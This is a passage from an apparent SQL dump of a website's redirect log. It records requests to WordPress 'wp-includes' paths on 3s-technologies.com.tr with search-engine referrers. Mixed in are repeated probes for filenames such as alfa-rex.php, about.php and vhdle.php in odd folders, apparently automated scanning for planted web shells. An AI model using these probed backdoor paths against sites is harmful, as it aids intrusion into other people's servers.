00:00:00',301),(52944,'http://3s-technologies.com.tr/en/wp-includes/class-wp-token-map.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:59','0000-00-00 00:00:00',301),(52945,'http://3s-technologies.com.tr/en/wp-includes/class-wp-user-meta-session-tokens.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:00','0000-00-00 00:00:00',301),(52946,'http://3s-technologies.com.tr/en/wp-includes/class-wp-user-query.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:18:01','0000-00-00 00:00:00',301),(52947,'http://3s-technologies.com.tr/en/wp-includes/class-wp-user-request.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:18:02','0000-00-00 00:00:00',301),(52948,'http://3s-technologies.com.tr/en/wp-includes/class-wp-user.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:03','0000-00-00 00:00:00',301),(52949,'http://3s-technologies.com.tr/en/wp-includes/class-wp-walker.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:03','0000-00-00 00:00:00',301),(52950,'http://3s-technologies.com.tr/en/wp-includes/class-wp-widget-factory.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:04','0000-00-00 00:00:00',301),(52951,'http://3s-technologies.com.tr/en/wp-includes/class-wp-widget.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:18:05','0000-00-00 00:00:00',301),(52952,'http://3s-technologies.com.tr/en/wp-includes/class-wp-xmlrpc-server.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:18:06','0000-00-00 00:00:00',301),(52953,'http://3s-technologies.com.tr/en/wp-includes/class-wpdb.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:18:08','0000-00-00 00:00:00',301),(52954,'http://3s-technologies.com.tr/en/wp-includes/class.wp-dependencies.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:18:09','0000-00-00 00:00:00',301),(52955,'http://3s-technologies.com.tr/en/wp-includes/class.wp-scripts.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:10','0000-00-00 00:00:00',301),(52956,'http://3s-technologies.com.tr/en/wp-includes/class.wp-styles.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:11','0000-00-00 00:00:00',301),(52957,'http://3s-technologies.com.tr/en/wp-includes/click.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:12','0000-00-00 00:00:00',301),(52958,'http://3s-technologies.com.tr/en/wp-includes/comment-template.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:13','0000-00-00 00:00:00',301),(52959,'http://3s-technologies.com.tr/en/wp-includes/comment.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:14','0000-00-00 00:00:00',301),(52960,'http://3s-technologies.com.tr/en/wp-includes/compat.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:15','0000-00-00 00:00:00',301),(52961,'http://3s-technologies.com.tr/en/wp-includes/cron.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:16','0000-00-00 00:00:00',301),(52962,'http://3s-technologies.com.tr/en/wp-includes/css/alfa-rex.php',NULL,'https://www.google.com/','',5,0,'2025-12-20 05:18:17','0000-00-00 00:00:00',301),(52963,'http://3s-technologies.com.tr/en/wp-includes/css/dist/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:18','0000-00-00 00:00:00',301),(52964,'http://3s-technologies.com.tr/en/wp-includes/css/dist/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:18:19','0000-00-00 00:00:00',301),(52965,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-directory/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:20','0000-00-00 00:00:00',301),(52966,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-directory/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:21','0000-00-00 00:00:00',301),(52967,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-directory/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:22','0000-00-00 00:00:00',301),(52968,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-editor/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:23','0000-00-00 00:00:00',301),(52969,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-editor/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:18:24','0000-00-00 00:00:00',301),(52970,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-editor/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:18:24','0000-00-00 00:00:00',301),(52971,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-library/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:25','0000-00-00 00:00:00',301),(52972,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-library/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:26','0000-00-00 00:00:00',301),(52973,'http://3s-technologies.com.tr/en/wp-includes/css/dist/block-library/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:27','0000-00-00 00:00:00',301),(52974,'http://3s-technologies.com.tr/en/wp-includes/css/dist/commands/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:18:28','0000-00-00 00:00:00',301),(52975,'http://3s-technologies.com.tr/en/wp-includes/css/dist/commands/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:29','0000-00-00 00:00:00',301),(52976,'http://3s-technologies.com.tr/en/wp-includes/css/dist/commands/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:30','0000-00-00 00:00:00',301),(52977,'http://3s-technologies.com.tr/en/wp-includes/css/dist/components/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:18:31','0000-00-00 00:00:00',301),(52978,'http://3s-technologies.com.tr/en/wp-includes/css/dist/components/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:18:32','0000-00-00 00:00:00',301),(52979,'http://3s-technologies.com.tr/en/wp-includes/css/dist/components/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:33','0000-00-00 00:00:00',301),(52980,'http://3s-technologies.com.tr/en/wp-includes/css/dist/customize-widgets/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:18:34','0000-00-00 00:00:00',301),(52981,'http://3s-technologies.com.tr/en/wp-includes/css/dist/customize-widgets/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:34','0000-00-00 00:00:00',301),(52982,'http://3s-technologies.com.tr/en/wp-includes/css/dist/customize-widgets/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:35','0000-00-00 00:00:00',301),(52983,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-post/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:36','0000-00-00 00:00:00',301),(52984,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-post/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:37','0000-00-00 00:00:00',301),(52985,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-post/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:38','0000-00-00 00:00:00',301),(52986,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-site/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:39','0000-00-00 00:00:00',301),(52987,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-site/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:18:40','0000-00-00 00:00:00',301),(52988,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-site/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:41','0000-00-00 00:00:00',301),(52989,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-widgets/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:41','0000-00-00 00:00:00',301),(52990,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-widgets/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:18:43','0000-00-00 00:00:00',301),(52991,'http://3s-technologies.com.tr/en/wp-includes/css/dist/edit-widgets/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:18:44','0000-00-00 00:00:00',301),(52992,'http://3s-technologies.com.tr/en/wp-includes/css/dist/editor/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:45','0000-00-00 00:00:00',301),(52993,'http://3s-technologies.com.tr/en/wp-includes/css/dist/editor/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:46','0000-00-00 00:00:00',301),(52994,'http://3s-technologies.com.tr/en/wp-includes/css/dist/editor/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:47','0000-00-00 00:00:00',301),(52995,'http://3s-technologies.com.tr/en/wp-includes/css/dist/format-library/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:48','0000-00-00 00:00:00',301),(52996,'http://3s-technologies.com.tr/en/wp-includes/css/dist/format-library/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:49','0000-00-00 00:00:00',301),(52997,'http://3s-technologies.com.tr/en/wp-includes/css/dist/format-library/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:18:50','0000-00-00 00:00:00',301),(52998,'http://3s-technologies.com.tr/en/wp-includes/css/dist/list-reusable-blocks/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:50','0000-00-00 00:00:00',301),(52999,'http://3s-technologies.com.tr/en/wp-includes/css/dist/list-reusable-blocks/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:51','0000-00-00 00:00:00',301),(53000,'http://3s-technologies.com.tr/en/wp-includes/css/dist/list-reusable-blocks/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:18:52','0000-00-00 00:00:00',301),(53001,'http://3s-technologies.com.tr/en/wp-includes/css/dist/nux/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:18:53','0000-00-00 00:00:00',301),(53002,'http://3s-technologies.com.tr/en/wp-includes/css/dist/nux/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:18:54','0000-00-00 00:00:00',301),(53003,'http://3s-technologies.com.tr/en/wp-includes/css/dist/nux/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:18:55','0000-00-00 00:00:00',301),(53004,'http://3s-technologies.com.tr/en/wp-includes/css/dist/patterns/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:18:56','0000-00-00 00:00:00',301),(53005,'http://3s-technologies.com.tr/en/wp-includes/css/dist/patterns/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:18:57','0000-00-00 00:00:00',301),(53006,'http://3s-technologies.com.tr/en/wp-includes/css/dist/patterns/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:18:58','0000-00-00 00:00:00',301),(53007,'http://3s-technologies.com.tr/en/wp-includes/css/dist/preferences/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:00','0000-00-00 00:00:00',301),(53008,'http://3s-technologies.com.tr/en/wp-includes/css/dist/preferences/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:01','0000-00-00 00:00:00',301),(53009,'http://3s-technologies.com.tr/en/wp-includes/css/dist/preferences/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:01','0000-00-00 00:00:00',301),(53010,'http://3s-technologies.com.tr/en/wp-includes/css/dist/reusable-blocks/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:02','0000-00-00 00:00:00',301),(53011,'http://3s-technologies.com.tr/en/wp-includes/css/dist/reusable-blocks/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:19:03','0000-00-00 00:00:00',301),(53012,'http://3s-technologies.com.tr/en/wp-includes/css/dist/reusable-blocks/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:19:04','0000-00-00 00:00:00',301),(53013,'http://3s-technologies.com.tr/en/wp-includes/css/dist/widgets/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:06','0000-00-00 00:00:00',301),(53014,'http://3s-technologies.com.tr/en/wp-includes/css/dist/widgets/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:07','0000-00-00 00:00:00',301),(53015,'http://3s-technologies.com.tr/en/wp-includes/css/dist/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:08','0000-00-00 00:00:00',301),(53016,'http://3s-technologies.com.tr/en/wp-includes/css/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:08','0000-00-00 00:00:00',301),(53017,'http://3s-technologies.com.tr/en/wp-includes/customize/alfa-rex.php',NULL,'https://duckduckgo.com/','',5,0,'2025-12-20 05:19:09','0000-00-00 00:00:00',301),(53018,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-background-image-control.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:10','0000-00-00 00:00:00',301),(53019,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-background-image-setting.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:11','0000-00-00 00:00:00',301),(53020,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-background-position-control.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:12','0000-00-00 00:00:00',301),(53021,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-code-editor-control.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:13','0000-00-00 00:00:00',301),(53022,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-color-control.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:14','0000-00-00 00:00:00',301),(53023,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-cropped-image-control.php',NULL,'https://www.bing.com/','',10,0,'2025-12-20 05:19:15','0000-00-00 00:00:00',301),(53024,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-custom-css-setting.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:16','0000-00-00 00:00:00',301),(53025,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-date-time-control.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:17','0000-00-00 00:00:00',301),(53026,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-filter-setting.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:18','0000-00-00 00:00:00',301),(53027,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-header-image-control.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:19:18','0000-00-00 00:00:00',301),(53028,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-header-image-setting.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:19','0000-00-00 00:00:00',301),(53029,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-image-control.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:20','0000-00-00 00:00:00',301),(53030,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-media-control.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:21','0000-00-00 00:00:00',301),(53031,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:22','0000-00-00 00:00:00',301),(53032,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-control.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:23','0000-00-00 00:00:00',301),(53033,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-item-control.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:24','0000-00-00 00:00:00',301),(53034,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:25','0000-00-00 00:00:00',301),(53035,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-location-control.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:26','0000-00-00 00:00:00',301),(53036,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:27','0000-00-00 00:00:00',301),(53037,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-name-control.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:27','0000-00-00 00:00:00',301),(53038,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-section.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:28','0000-00-00 00:00:00',301),(53039,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu-setting.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:29','0000-00-00 00:00:00',301),(53040,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menus-panel.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:30','0000-00-00 00:00:00',301),(53041,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-new-menu-control.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:31','0000-00-00 00:00:00',301),(53042,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-new-menu-section.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:32','0000-00-00 00:00:00',301),(53043,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-partial.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:33','0000-00-00 00:00:00',301),(53044,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-selective-refresh.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:34','0000-00-00 00:00:00',301),(53045,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-sidebar-section.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:35','0000-00-00 00:00:00',301),(53046,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-site-icon-control.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:35','0000-00-00 00:00:00',301),(53047,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-theme-control.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:36','0000-00-00 00:00:00',301),(53048,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-themes-panel.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:37','0000-00-00 00:00:00',301),(53049,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-themes-section.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:38','0000-00-00 00:00:00',301),(53050,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-upload-control.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:39','0000-00-00 00:00:00',301),(53051,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-sidebar-block-editor-control.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:40','0000-00-00 00:00:00',301),(53052,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-widget-area-customize-control.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:41','0000-00-00 00:00:00',301),(53053,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-widget-form-customize-control.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:19:42','0000-00-00 00:00:00',301),(53054,'http://3s-technologies.com.tr/en/wp-includes/customize/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:42','0000-00-00 00:00:00',301),(53055,'http://3s-technologies.com.tr/en/wp-includes/date.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:43','0000-00-00 00:00:00',301),(53056,'http://3s-technologies.com.tr/en/wp-includes/default-constants.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:44','0000-00-00 00:00:00',301),(53057,'http://3s-technologies.com.tr/en/wp-includes/default-filters.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:45','0000-00-00 00:00:00',301),(53058,'http://3s-technologies.com.tr/en/wp-includes/default-widgets.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:46','0000-00-00 00:00:00',301),(53059,'http://3s-technologies.com.tr/en/wp-includes/defaults.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:47','0000-00-00 00:00:00',301),(53060,'http://3s-technologies.com.tr/en/wp-includes/deprecated.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:19:48','0000-00-00 00:00:00',301),(53061,'http://3s-technologies.com.tr/en/wp-includes/edit.php',NULL,'https://www.bing.com/','',10,0,'2025-12-20 05:19:49','0000-00-00 00:00:00',301),(53062,'http://3s-technologies.com.tr/en/wp-includes/embed-template.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:19:49','0000-00-00 00:00:00',301),(53063,'http://3s-technologies.com.tr/en/wp-includes/embed.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:50','0000-00-00 00:00:00',301),(53064,'http://3s-technologies.com.tr/en/wp-includes/error-protection.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:51','0000-00-00 00:00:00',301),(53065,'http://3s-technologies.com.tr/en/wp-includes/feed-atom-comments.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:19:52','0000-00-00 00:00:00',301),(53066,'http://3s-technologies.com.tr/en/wp-includes/feed-atom.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:53','0000-00-00 00:00:00',301),(53067,'http://3s-technologies.com.tr/en/wp-includes/feed-rdf.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:19:54','0000-00-00 00:00:00',301),(53068,'http://3s-technologies.com.tr/en/wp-includes/feed-rss.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:19:55','0000-00-00 00:00:00',301),(53069,'http://3s-technologies.com.tr/en/wp-includes/feed-rss2-comments.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:19:56','0000-00-00 00:00:00',301),(53070,'http://3s-technologies.com.tr/en/wp-includes/feed-rss2.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:57','0000-00-00 00:00:00',301),(53071,'http://3s-technologies.com.tr/en/wp-includes/feed.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:19:58','0000-00-00 00:00:00',301),(53072,'http://3s-technologies.com.tr/en/wp-includes/fonts.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:19:59','0000-00-00 00:00:00',301),(53073,'http://3s-technologies.com.tr/en/wp-includes/fonts/alfa-rex.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:20:01','0000-00-00 00:00:00',301),(53074,'http://3s-technologies.com.tr/en/wp-includes/fonts/class-wp-font-collection.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:01','0000-00-00 00:00:00',301),(53075,'http://3s-technologies.com.tr/en/wp-includes/fonts/class-wp-font-face-resolver.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:20:02','0000-00-00 00:00:00',301),(53076,'http://3s-technologies.com.tr/en/wp-includes/fonts/class-wp-font-face.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:03','0000-00-00 00:00:00',301),(53077,'http://3s-technologies.com.tr/en/wp-includes/fonts/class-wp-font-library.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:04','0000-00-00 00:00:00',301),(53078,'http://3s-technologies.com.tr/en/wp-includes/fonts/class-wp-font-utils.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:05','0000-00-00 00:00:00',301),(53079,'http://3s-technologies.com.tr/en/wp-includes/fonts/load.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:06','0000-00-00 00:00:00',301),(53080,'http://3s-technologies.com.tr/en/wp-includes/fonts/wp/vhdle.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:06','0000-00-00 00:00:00',301),(53081,'http://3s-technologies.com.tr/en/wp-includes/formatting.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:07','0000-00-00 00:00:00',301),(53082,'http://3s-technologies.com.tr/en/wp-includes/functions.wp-scripts.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:09','0000-00-00 00:00:00',301),(53083,'http://3s-technologies.com.tr/en/wp-includes/functions.wp-styles.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:10','0000-00-00 00:00:00',301),(53084,'http://3s-technologies.com.tr/en/wp-includes/general-template.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:20:11','0000-00-00 00:00:00',301),(53085,'http://3s-technologies.com.tr/en/wp-includes/global-styles-and-settings.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:12','0000-00-00 00:00:00',301),(53086,'http://3s-technologies.com.tr/en/wp-includes/html-api/alfa-rex.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:20:13','0000-00-00 00:00:00',301),(53087,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-active-formatting-elements.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:14','0000-00-00 00:00:00',301),(53088,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-attribute-token.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:15','0000-00-00 00:00:00',301),(53089,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-decoder.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:16','0000-00-00 00:00:00',301),(53090,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-doctype-info.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:20:17','0000-00-00 00:00:00',301),(53091,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-open-elements.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:18','0000-00-00 00:00:00',301),(53092,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-processor-state.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:19','0000-00-00 00:00:00',301),(53093,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-processor.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:20:20','0000-00-00 00:00:00',301),(53094,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-span.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:21','0000-00-00 00:00:00',301),(53095,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-stack-event.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:22','0000-00-00 00:00:00',301),(53096,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-tag-processor.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:22','0000-00-00 00:00:00',301),(53097,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-text-replacement.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:20:23','0000-00-00 00:00:00',301),(53098,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-token.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:24','0000-00-00 00:00:00',301),(53099,'http://3s-technologies.com.tr/en/wp-includes/html-api/class-wp-html-unsupported-exception.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:25','0000-00-00 00:00:00',301),(53100,'http://3s-technologies.com.tr/en/wp-includes/html-api/html5-named-character-references.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:20:26','0000-00-00 00:00:00',301),(53101,'http://3s-technologies.com.tr/en/wp-includes/html-api/wp-login.php',NULL,'https://www.bing.com/','',3,0,'2025-12-20 05:20:28','0000-00-00 00:00:00',301),(53102,'http://3s-technologies.com.tr/en/wp-includes/http.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:29','0000-00-00 00:00:00',301),(53103,'http://3s-technologies.com.tr/en/wp-includes/https-detection.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:30','0000-00-00 00:00:00',301),(53104,'http://3s-technologies.com.tr/en/wp-includes/https-migration.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:31','0000-00-00 00:00:00',301),(53105,'http://3s-technologies.com.tr/en/wp-includes/interactivity-api/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:32','0000-00-00 00:00:00',301),(53106,'http://3s-technologies.com.tr/en/wp-includes/interactivity-api/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:20:32','0000-00-00 00:00:00',301),(53107,'http://3s-technologies.com.tr/en/wp-includes/interactivity-api/class-wp-interactivity-api-directives-processor.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 